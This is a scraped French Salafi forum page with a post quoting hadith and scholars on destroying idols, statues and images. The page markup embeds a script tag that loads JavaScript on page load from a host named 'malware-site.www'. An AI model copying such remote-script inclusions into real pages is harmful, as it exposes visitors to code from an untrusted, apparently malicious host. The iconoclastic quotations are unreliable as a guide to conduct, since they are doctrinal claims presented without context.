ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Septembre 2017

LunMarMerJeuVenSamDim
    123
45678910
11121314151617
18192021222324
252627282930 

Calendrier Calendrier


    L'ordre d'effacer les images et de détruire les idoles

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    L'ordre d'effacer les images et de détruire les idoles

    Message par assalafia le Jeu 2 Jan - 11:11

    Surprised 



    - Amrou ibn Abassa rapporte qu’il a demandé au Messager d’Allah (paix et bénédiction sur lui): « Par quoi Allah t’a envoyé? » Il répondit: « par le maintien du lien des parentés, la destruction des statues, le maintien de l’unicité d’Allah et du fait que personne ne Lui donne un associé » (Rapporté par Muslim).
    - Abou al-Hayyaj rapporte que ‘Ali (qu’Allah soit satisfait de lui) lui a dit: « Je t’envoie par ce qu’Allah a envoyé Son Messager! » Il ajouta: « Ne laisse aucune image sans la démolir, aucune tombe élevée sans la niveler » (Rapporté par Muslim). Dans le Musnad de l’Imam Ahmad, on trouve le même hadith mais avec une expression de plus: « ...et détruis toute statue.
    »



    - Abou Oumamah (qu’Allah soit satisfait de lui) rapporte que le Prophète (bénédiction et paix sur lui) a dit: « Allah m’a envoyé pour être une miséricorde pour tout le monde et m’a ordonné de démolir les idoles » (Rapporté par l’Imam Ahmad).
    - Dans le Sahih de Bukhari, il a été rapporté que quand le Messager d’Allah (bénédiction et paix sur lui) est entré à la Mecque en triomphe, il a détruit lui-même avec son arc 360 idoles en disant: « Et dis: "La Vérité est venue et l’Erreur a disparu. Car l’Erreur est destinée à disparaître" » « Dis: "La vérité est venue. Et le Faux ne peut rien commencer ni renouveler" » Les idoles tombaient alors, la face en avant.



    - Les deux Imams Bukhari et Muslim rapportent de la part d’Ibn ‘Omar que le Messager d’Allah (bénédiction et paix sur lui) a dit: « Ceux qui reproduisent les images (d’être vivants) seront châtiés le Jour de Résurrection, on leur dira: "Faîtes vivre ce que vous avez créé" »
    - Ils rapportent aussi que ‘Abd Allah Ibn Mas‘oud rapporte que le Messager d’Allah (bénédiction et paix sur lui) a dit: « Les gens les plus châtiés le Jour de Résurrection sont ceux qui reproduisent les images (d’êtres vivants) »
    - ‘Aïcha (Qu’Allah soit satisfait d’elle) a dit: Le Messager d’Allah est entré alors que j’étais couverte d’un tissu présentant une image; le visage du Messager d’Allah a changé de couleur puis il l’a déchiré et a dit: « Les gens les plus châtiés le Jour de Résurrection sont ceux qui imitent la création d’Allah » (Bukhari et Muslim)
    - L’Imam at-Tirmidhi rapporte que Jabir a dit: « Le Messager d’Allah a interdit d’avoir une image à la maison et a interdit de reproduire les images »
    - ‘Ady ibn Hatem a rapporté: « Je suis allé voir le Messager d’Allah (bénédiction et paix sur lui) et sur mon cou une croix en or. Le Messager d’Allah m’a dit: « O ‘Ady, enlève cette idole » (Rapporté par at-Tirmidhi).
    - Abou Hurayra rapporte que le Messager d’Allah a dit: « Les anges n’entrent pas dans une maison qui contient des statues ou des images » (Rapporté par Bukhari et Muslim).
    - Abou Muhammad al-Hadhali rapporte que ‘Ali ibn Abi Taleb a dit: Le Messager d’Allah était en funérailles puis il a dit: « Lequel parmi vous part à la ville et ne laisse aucune statue sans la détruire, ni une tombe sans la réparer, ni une image sans la démolir? ». Quelqu’un a répondu: Moi ô Messager d’Allah! Il est parti mais par peur de la population, il est retourné. ‘Ali a dit alors: « moi je pars ô Messager d’Allah! » Il est parti puis il est retourné et a dit: « ô Messager d’Allah! Je n’ai laissé aucune statue sans la détruire, aucune tombe élevée sans la niveler et aucune image sans la démolir. » (Rapporté par l’Imam Ahmad).
    Ibn al-Qayyim dit:Allah a envoyé ses Messagers pour détruire les statues et pour qu’on L’adore Seul sans Lui donner des associés.
    (Rawdat al-Muhibbin, p. 481).
    L’Imam Chafi‘i a rapporté que les Imams de la Mecque ordonnaient de détruire les statues sculptées sur les tombes (sharh muslim de nawawi)

      La date/heure actuelle est Ven 22 Sep - 12:56